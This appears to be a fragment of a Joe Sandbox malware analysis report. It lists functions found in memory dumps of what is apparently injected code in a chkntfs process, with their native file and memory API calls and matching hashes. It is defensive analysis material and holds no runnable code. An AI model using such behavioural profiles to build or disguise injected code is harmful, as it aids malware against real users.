                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: 2b4baf0e598f411f09611177379fb48106604199be111d715152f008809dadfc
                                                                      • Instruction ID: 3c179297ca68c53d4329c581ee55e2e3a1f53b0d5cda65aa3dd4a6d03553b03c
                                                                      • Opcode Fuzzy Hash: 2b4baf0e598f411f09611177379fb48106604199be111d715152f008809dadfc
                                                                      • Instruction Fuzzy Hash: 3A315271A00208BBDB24EB65CC85FEF777DAB54708F14455EB909A7180DB70AA858FA0
                                                                      Function 024A9B80 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtCreateFile.NTDLL(?,?,?,768535EC,?,?,?,?,?,?,?), ref: 024A9C81
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 838509e54f2c3364d4e31241d664639feca510ee22d101a62e60937b6d912ff3
                                                                      • Instruction ID: f98b9dfe0ce0c3b215a9b48438efeefb22f8eb84356ba08cdbf75daca0a7a4cd
                                                                      • Opcode Fuzzy Hash: 838509e54f2c3364d4e31241d664639feca510ee22d101a62e60937b6d912ff3
                                                                      • Instruction Fuzzy Hash: 0131D4B5A01248AFDB14DF99D881EEEB7B9EF88304F50811AF919A7340D770A841CFA4
                                                                      Function 024A9CF0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtReadFile.NTDLL(?,?,?,768535EC,?,?,?,?,?), ref: 024A9DD6
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 996f1081be8b6bd0d481505ba80854a18546974636fedac09fe5db59dc8346e8
                                                                      • Instruction ID: cdefb60c192b7741514421820567cf8969bb2c2801780a6207234579b7487458
                                                                      • Opcode Fuzzy Hash: 996f1081be8b6bd0d481505ba80854a18546974636fedac09fe5db59dc8346e8
                                                                      • Instruction Fuzzy Hash: AA31D6B5A00208AFDB14DF99D841EEFB7B9EF88714F10821EF919A7245D770A851CFA4
                                                                      Function 024A9FE0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(0249271E,?,024A897F,768535EC,00000004,00003000,?,?,?,?,?,024A897F,0249271E), ref: 024AA0A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: 8c6a582bc137f94b396dcefe995f7a27d6977d89f90340d5bd04032a234a9bd6
                                                                      • Instruction ID: ab901418bb49e912a574d561a9c6bd0a880654582941cb0ab2e80460ca8a2a6d
                                                                      • Opcode Fuzzy Hash: 8c6a582bc137f94b396dcefe995f7a27d6977d89f90340d5bd04032a234a9bd6
                                                                      • Instruction Fuzzy Hash: 8321F7B5A00209AFDB10DF99DC41EAF77B9EF98714F10851EF918A7241D770A911CFA4
                                                                      Function 024A9DE0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: faa09dc2a236f09839a364d06909e5d020f342630ed6c269c30112f4f4111c35
                                                                      • Instruction ID: 623b807f065f23ecbc2ad2cd84cd99284261ecaacb04ca360dfeb92bf97e2e19
                                                                      • Opcode Fuzzy Hash: faa09dc2a236f09839a364d06909e5d020f342630ed6c269c30112f4f4111c35
                                                                      • Instruction Fuzzy Hash: 4A119E71A10208AFE720EB65CC01FEF73ADEF98718F50410EF918A7282E77165018BE5
                                                                      Function 024A9E80 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 024A9EB7
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 9a07b63f02d8e796ddfdb53e18b4c4dc38963cf0b6de78ec5b5ab501614c7820
                                                                      • Instruction ID: 55f89be29ddbbff7d309c80c2568939ca96721cd188e0aa320f5368b3dbff0a0
                                                                      • Opcode Fuzzy Hash: 9a07b63f02d8e796ddfdb53e18b4c4dc38963cf0b6de78ec5b5ab501614c7820
                                                                      • Instruction Fuzzy Hash: 8FE04F316102187BD110AA5ADC11F9B776DDBC5710F41441AFA18A7142C67179018AE0
                                                                      Function 044C4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8a36a1ddd76b6a7908eb9bb3c4707f33338cd53bae1a9529bac9f0e52ff04dd6
                                                                      • Instruction ID: f83a8fab5c1053d910a20aefe84aa61b8cfda362b4840016825c8fdb09357e72
                                                                      • Opcode Fuzzy Hash: 8a36a1ddd76b6a7908eb9bb3c4707f33338cd53bae1a9529bac9f0e52ff04dd6
                                                                      • Instruction Fuzzy Hash: BC9002656015104265407158481441660159BF1305395C116A0655570C871CD9559269
                                                                      Function 044C4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d8024f8d09d619768886fa3390bec32f48a58b3849b0b22aee41339a6172ee6c
                                                                      • Instruction ID: f7aa71ee678885bd260f51685528d9e20d590e9aeeee0ba514055590b1ba76d3
                                                                      • Opcode Fuzzy Hash: d8024f8d09d619768886fa3390bec32f48a58b3849b0b22aee41339a6172ee6c
                                                                      • Instruction Fuzzy Hash: 5990023560581012B5407158489455640159BF0305B55C012E0525564C8B18DA565361
                                                                      Function 044C2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 28d87e31f68dd016c0119ece053ea4a1e43aa5866bd6b86a214456b57d279525
                                                                      • Instruction ID: f5cc4fbc7d47a942517c2258090ba8575f1e7c6993791e06df4cdc9f4e33d573
                                                                      • Opcode Fuzzy Hash: 28d87e31f68dd016c0119ece053ea4a1e43aa5866bd6b86a214456b57d279525
                                                                      • Instruction Fuzzy Hash: E390023520141842F50071584414B5600158BF0305F55C017A0225664D8719D9517521
                                                                      Function 044C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: dc394766b060576518084b2d49f5d0f95841db9143d338984850edc6709a8c0e
                                                                      • Instruction ID: e0dc4b6d3243a13eddaeda6a2352d81dea64d0a3044b26d00af33b9470367788
                                                                      • Opcode Fuzzy Hash: dc394766b060576518084b2d49f5d0f95841db9143d338984850edc6709a8c0e
                                                                      • Instruction Fuzzy Hash: 7590023520149802F5107158841475A00158BE0305F59C412A4525668D8799D9917121
                                                                      Function 044C2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7ff9a2f338d280bdd2f59e05ed481975a1cea8e802f9eacd4a6f1930e27ec121
                                                                      • Instruction ID: b008a9eb927de027fd08e801e67642e566236f069611239afafe291bfd08e9e5
                                                                      • Opcode Fuzzy Hash: 7ff9a2f338d280bdd2f59e05ed481975a1cea8e802f9eacd4a6f1930e27ec121
                                                                      • Instruction Fuzzy Hash: 4D90023520141402F5007598541865600158BF0305F55D012A5125565EC769D9916131
                                                                      Function 044C2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 926e2cee323f59d13eb14f600a7f4078bedda82421e71652c68f183f4d70f8d1
                                                                      • Instruction ID: 34cdef1476a51a213900dd1616393847af541d339a748eaa1eac0e31a3d50790
                                                                      • Opcode Fuzzy Hash: 926e2cee323f59d13eb14f600a7f4078bedda82421e71652c68f183f4d70f8d1
                                                                      • Instruction Fuzzy Hash: F490022D21341002F5807158541861A00158BE1206F95D416A0116568CCA19D9695321
                                                                      Function 044C2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 1ca4946646b4c12e0b844d6146134c0bf46a169a3d6d884918fcd22721a2d949
                                                                      • Instruction ID: 5428efe465f708d4a67c44ab25c6bdd9bd3e20a933d972d2dc56b40ad08cbb1b
                                                                      • Opcode Fuzzy Hash: 1ca4946646b4c12e0b844d6146134c0bf46a169a3d6d884918fcd22721a2d949
                                                                      • Instruction Fuzzy Hash: E490022530141003F540715854286164015DBF1305F55D012E0515564CDA19D9565222
                                                                      Function 044C2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: cbc26e7a54dc1ade94de86ab68e02faa7c979b4182f29619090e573069e7946d
                                                                      • Instruction ID: 5e2178da90b10dd9430ddeadedda37cd35a6ffb8dcd991d6d9a265640d74487c
                                                                      • Opcode Fuzzy Hash: cbc26e7a54dc1ade94de86ab68e02faa7c979b4182f29619090e573069e7946d
                                                                      • Instruction Fuzzy Hash: 9A900225242451527945B158441451740169BF0245795C013A1515960C862AE956D621
                                                                      Function 044C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: aec570483e85f62d9399443ab7191868de49a3f334a93ac01ec85df98dc1b384
                                                                      • Instruction ID: 33739269febb21b814de9bfeb5fc56dc7233c56e5827b90c120a811da02b01e6
                                                                      • Opcode Fuzzy Hash: aec570483e85f62d9399443ab7191868de49a3f334a93ac01ec85df98dc1b384
                                                                      • Instruction Fuzzy Hash: 2D90023520141413F5117158451471700198BE0245F95C413A0525568D975ADA52A121
                                                                      Function 044C2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3473e7ee0495efe5050ba1e071eaae06021f798086e829ab6cf2d6503eafa5d8
                                                                      • Instruction ID: a83747c7761ba1827d6b4f98843bc8193a4f4904bd24e9ebb7692f6b92dad586
                                                                      • Opcode Fuzzy Hash: 3473e7ee0495efe5050ba1e071eaae06021f798086e829ab6cf2d6503eafa5d8
                                                                      • Instruction Fuzzy Hash: A590026520181403F5407558481461700158BE0306F55C012A2165565E8B2DDD516135
                                                                      Function 044C2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e7f6bc1894f2bf7b27708b63a0798aae97f498249371ec8564e3e061faa765cd
                                                                      • Instruction ID: 3f73e21d2be72dfcdd0d96e8a4eb31cafdbae66a15fa4c1cbd8256347363446e
                                                                      • Opcode Fuzzy Hash: e7f6bc1894f2bf7b27708b63a0798aae97f498249371ec8564e3e061faa765cd
                                                                      • Instruction Fuzzy Hash: 6890022560141502F50171584414626001A8BE0245F95C023A1125565ECB29DA92A131
                                                                      Function 044C2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 4c25192b2a7888a61512e5a9d29cca497731dcfc58fb0fd7b6b4e3fb3f4e84fb
                                                                      • Instruction ID: 6b7b4436162696778639af82b6bf823da8221858357eb1412a88260e93837878
                                                                      • Opcode Fuzzy Hash: 4c25192b2a7888a61512e5a9d29cca497731dcfc58fb0fd7b6b4e3fb3f4e84fb
                                                                      • Instruction Fuzzy Hash: 5690026534141442F50071584424B160015CBF1305F55C016E1165564D871DDD526126
                                                                      Function 044C2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d2f901cfa20464f8199742eb3791e8766e5832913db8c559ff7740a8b4bac873
                                                                      • Instruction ID: 51bdd0f2b4d95936cacd73c3443a96e78ab500842517b39ec0c1218310fdaafc
                                                                      • Opcode Fuzzy Hash: d2f901cfa20464f8199742eb3791e8766e5832913db8c559ff7740a8b4bac873
                                                                      • Instruction Fuzzy Hash: 25900225211C1042F60075684C24B1700158BE0307F55C116A0255564CCA19D9615521
                                                                      Function 044C2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e16e3c5a1149f086812aba1a9e9a59ce83d50a545f3e6087f5a50a3f33749f88
                                                                      • Instruction ID: e94523fac0573d81eea9bede9ef8223bdfb18e0f0da2072082e34f66ac89ed3b
                                                                      • Opcode Fuzzy Hash: e16e3c5a1149f086812aba1a9e9a59ce83d50a545f3e6087f5a50a3f33749f88
                                                                      • Instruction Fuzzy Hash: 31900225601410426540716888549164015AFF1215755C122A0A99560D865DD9655665
                                                                      Function 044C2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 493eeff37cc7b0a38a4971eedcbb386ed661fb1e43aff9101563b3d31f831572
                                                                      • Instruction ID: 0ac5a7bae663d2e66e38a9deb03d34b9fc68f011f44191a3988b363d0f7ce27d
                                                                      • Opcode Fuzzy Hash: 493eeff37cc7b0a38a4971eedcbb386ed661fb1e43aff9101563b3d31f831572
                                                                      • Instruction Fuzzy Hash: FA900229211410032505B558071451700568BE5355355C022F1116560CD725D9615121
                                                                      Function 044C2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 9e9e2c7c22ef3fcef1d356ddb8c40debaaac1fa9b0de71172765ae5bd9fd9889
                                                                      • Instruction ID: 77f1bdb47d4df4de235f23c0070039f46eff5744f39b7434692c091b5c229c98
                                                                      • Opcode Fuzzy Hash: 9e9e2c7c22ef3fcef1d356ddb8c40debaaac1fa9b0de71172765ae5bd9fd9889
                                                                      • Instruction Fuzzy Hash: 1F900229221410022545B558061451B04559BE6355395C016F15175A0CC725D9655321
                                                                      Function 044C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f3e4b034ddb2d6f2a5c7337eb2e24ae6f319a58cb2e27418dcc62eda78d7d8e5
                                                                      • Instruction ID: 861c0e9af9c6d70f7748ea469bc2c6c330ff283c5807a06142ad9f7bcd800262
                                                                      • Opcode Fuzzy Hash: f3e4b034ddb2d6f2a5c7337eb2e24ae6f319a58cb2e27418dcc62eda78d7d8e5
                                                                      • Instruction Fuzzy Hash: 0090026520241003650571584424626401A8BF0205B55C022E11155A0DC629D9916125
                                                                      Function 044C2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
